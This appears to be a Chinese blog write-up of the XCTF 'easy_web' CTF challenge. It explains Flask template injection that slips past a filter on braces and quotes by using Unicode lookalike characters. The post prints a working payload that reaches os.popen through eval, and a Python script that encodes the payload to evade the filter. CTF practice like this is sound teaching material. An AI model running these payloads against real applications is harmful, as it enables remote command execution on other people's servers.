XCTF-easy_web

已于 2023-08-20 14:05:35 修改
阅读量164 收藏
点赞数
文章标签: 安全架构
于 2023-08-20 13:32:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43465336/article/details/132390640
版权

了解flask模板注入(ssti)

参考:https://blog.csdn.net/qq_59950255/article/details/123215817

easy_web

加引号尝试注入,有报错提示引号是不准使用的字符
在这里插入图片描述
检查网页源代码发现

<html><head>
<link rel="stylesheet" href="/static/cc.css">
<link rel="stylesheet" href="/static/common.css">
<script src="./../static/jquery.min.js"></script>
<script>
function send(){
	let str = $('#str')[0].value;
	if(str.length > 0){
		$.post("/", {'str': str}, function(data){
			$('#msg')[0].innerHTML = '<b>' + data + '</b>';
			$('#error')[0].className = "shorten_error_display";
		});
	}
}
</script>
</head>
<body><center><div id="content" class="" style="width: 700px;"><div class="shorten_page page_block" style="padding: 40px 20px 0;">
  <div class="shorten_header">字符规范器</div>
  <div class="shorten_about">将您输入的文本标准化的在线工具</div>

  <div class="shorten_row shorten_form_row" id="shorten_row">
    <div class="shorten_input shorten_input_wrapper" id="shorten_input_wrapper">
      <input type="text" class="dark shortener_input" id="str" placeholder="文本内容" value="ℒℯℴ𝓃𝒶𝒓𝒹𝘰">
    </div>

    <div class="shorten_input">
      <button class="shorten_button flat_button" onclick="send()" id="shorten_btn">
        Go
      </button>
    </div>
  </div>


  <div class="shorten_error" id="error" style="padding-bottom: 10px; height: 50px;">
    <div class="msg"><div id="msg" class="msg_text"></div></div>
  </div>

</div>

</div></center></body></html>

抓包中返回python版本,可能存在flask_ssti模板注入
在这里插入图片描述
输入{{11}}发现{{}}被过滤
在这里插入图片描述
找一些特殊字符看看字符规范器效果和能不能找到能规范成{{}}的特殊字符

特殊字符查找网站:
https://ip138.com/teshufuhao/
在这里插入图片描述

在这里插入图片描述
找到特殊字符︷︷︸︸
在这里插入图片描述
1+1的代码执行了,存在ssti模板注入漏洞
在这里插入图片描述
好用的payload

{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}

但需将受限字符先转为特殊字符,使用python脚本完成上述处理

"""
{ -> ︷/﹛
} -> ︸/﹜
' -> '
, -> ,
" -> "
"""
str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串
# 如果需要替换replace(被替换的字符,替换后的字符)
str = str.replace('{', '︷')
str = str.replace('}', '︸')
str = str.replace('\'', ''')
str = str.replace('\"', '"')

print(str)

在这里插入图片描述

结果payload

︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read())︸︸

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

flag{8f604f91-c36a-4413-bdaf-e786ffbfda61}

在这里插入图片描述
参考:
https://blog.csdn.net/yuanxu8877/article/details/128101173

要更加努力啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XCTF-Mobile】新手练习区-02-easy-dex.apk
08-16
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5089&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easydex
XCTF-Mobile】新手练习区-04-easyjava.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjava
XCTF-WEB
qq_43661408的博客
06-22 495
post和get 题目链接:http://111.198.29.45:34348/ 解题思路 首先使用 get方式提交变量a等于1 即 http://111.198.29.45:34348/?a=1 得到 第二条信息 需要使用post提交一个变量b值为2 因此使用火狐自带的插件hackbar,但是现在火狐更新后不能使用了,替代hackbar的插件有了 Max hackbar 和 hackbar q...
实验吧CTF练习题---web---登录一下好吗解析
dingbai2663的博客
09-12 317
实验吧web之登陆一下好么 地址:http://www.shiyanbar.com/ctf/1942 flag值:ctf{51d1bf8fb65a8c2406513ee8f52283e7} 解题步骤: 1、看题目提示,说是把所有语句都过滤了,那就不要往注入语句那个地方想了 2、检查网页源代码,没有啥问题,尝试用一下万能密码 一:username:1'=...
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
yuanxu8877的博客
11-29 1801
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
BUU WEB [SUCTF 2019]EasyWeb
A_dmin的博客
04-19 3248
BUU WEB [SUCTF 2019]EasyWeb emmm,这道题目涉及到较多知识点,就单独记录一下 首先打开网页可以看见源码: <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_...
web buuctf [安洵杯 2019]easy_web1
weixin_44214568的博客
03-23 1036
考点:md5强类型绕过(字符串) 一定要注意分析题目,要提高敏感 源代码最上面是一大串的base64编码后的文字,应该是左上角图像的编码,(这时候就应该考虑到能不能对index.php进行回显) 1.看链接上面有两个参数,一个是img,一个是file img的值是TXpVek5UTTFNbVUzTURabE5qYz0, 进行base64解码MzUzNTM1MmU3MDZlNjc=; 再进行base64解码3535352e706e67; 16进制转字符串555.png. 同样,对i..
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-Mobile】新手练习区-01-easy-apk.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyapk
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
xctf_web区题解(入门区1--6)
HelloWorld's blog
12-13 2755
xctf_web区题解(新手区1—6) ps:说明一下,这次这个题解可能是比较是比较low的,因为前一段时间在玩学校的vhdl来实现eda的大作业,花了我一段比较长的时间,另外之前一段时间再刷密码学的相关知识,也没这么去了解这个web这个方向的,对于小组内的blog我也就只能写写题解了,以后可能做了一些项目会写一些其他有意思的东西 1.view_source 据题目描述,这道题的flag应该是在网页的源代码中的,但是鼠标右键点不了。那么这里有其他的解决方法,我在这里主要说两个解决方法:1.就是在网址上直接输
XCTF高手进阶区】web1_baby_web writeup
weixin_50464560的博客
07-25 198
web1_baby_web 原题链接 key:php重定向   题目描述:想想初始页面是哪个 ①进入环境后页面显示只有HELLO WORLD 抬头看URL地址栏里访问的是1.php 根据题目描述,由初始页面想到index.php 尝试访问index.php,然而却又跳转到1.php   ②思路碰壁,不妨先御剑扫描一下???? 发现只有一个1.php可以访问 ...
XCTF攻防世界web进阶easytornado
qq_60787987的博客
04-02 3647
打开题目我们可以看到如下界面: 点开flag.txt看到 /flag.txt flag in /fllllllllllllag 提示我们flag所在的文件。 点开welcome.txt看到render,这里就涉及到本题目的核心知识,模板注入。这个等下再讲。 接下来,点开hints就看到 /hints.txt md5(cookie_secret+md5(filename)) 涉及到知识有 render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 ren
题目讲解3
aetlypdlg_ys的博客
05-18 405
id等于这玩意儿是因为$_SESSION['tokennum']没有什么东西,就直接让id=md5($_SESSION['tokennum'])就行,d41d8cd98f00b204e9800998ecf8427e这一串就是$_SESSION['tokennum']的md5加密。potin1k就是绕过addslashes,构造查看ae86qfC.php的内容。1{${highlight_file( 中的1是为了满足 if (intval,只要是数字开头的字符串就会返回数字,如果是纯字符串返回0。
[青少年CTF] easy_web 详解+避坑
明裕学长的博客
03-13 4690
这里坑就来了我们需要使用hackbar先进行一次post传递搭配burp抓包。希望小伙伴们可以一步一步的复现而不是直接填flag那样是没有效果滴!注意这里的回显结果不能出现md5 is funny ~发现它经过了两次base64编码和一次十六进制编码。我们反向操作一波查看index.php的源码。这里可以将img=删除因为我们已经绕过了。这里的%20是url编码是空格。下面在搭配../进行目录遍历。接着我们将post参数替换成。这让我联想到地址栏中的参数。下面我们进行了l\s绕过。解开后发现是图片源码。
「干货」XCTF Web安全入门练习靶场全部通关教程
橙留香Park的博客
04-13 6884
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
XCTF1-web文件包含绕过file include
orchid_sea的博客
11-17 691
当参数不为空时,使用file_get_contents()函数将文件内容读入字符串,判断是否为"hello ctf"使用COOKIE判断language参数为english时使用英语脚本,其他的使用lan参数加上php后缀。查看网页源代码,存在一段php代码,其中包含include()函数。添加Cookie参数,利用filter伪协议请求,得到flag。提示旗帜在flag.php文件中,但是直接访问是空白的页面。尝试转换过滤器,使用convert.icon.*绕过。包含flag.php文件。
XCTF攻防世界WEB新手练习篇
夜车星繁的博客
11-15 1510
做了很多题,web方向: 攻防世界web 来到齐学长推荐的攻防世界:https://adworld.xctf.org.cn/task 第一道题略过; 2.get_post 比较简单,按照提示两步即可得到flag HTTP协议中共定义了八种方法或者叫“动作”来表明对Request-URI指定的资源的不同操作方式,具体介绍如下: GET:向特定的资源发出请求。 POST:...
XCTFweb2(解密)解题代码
克格莫
12-24 2308
题目给出加密代码如下: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen(...
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值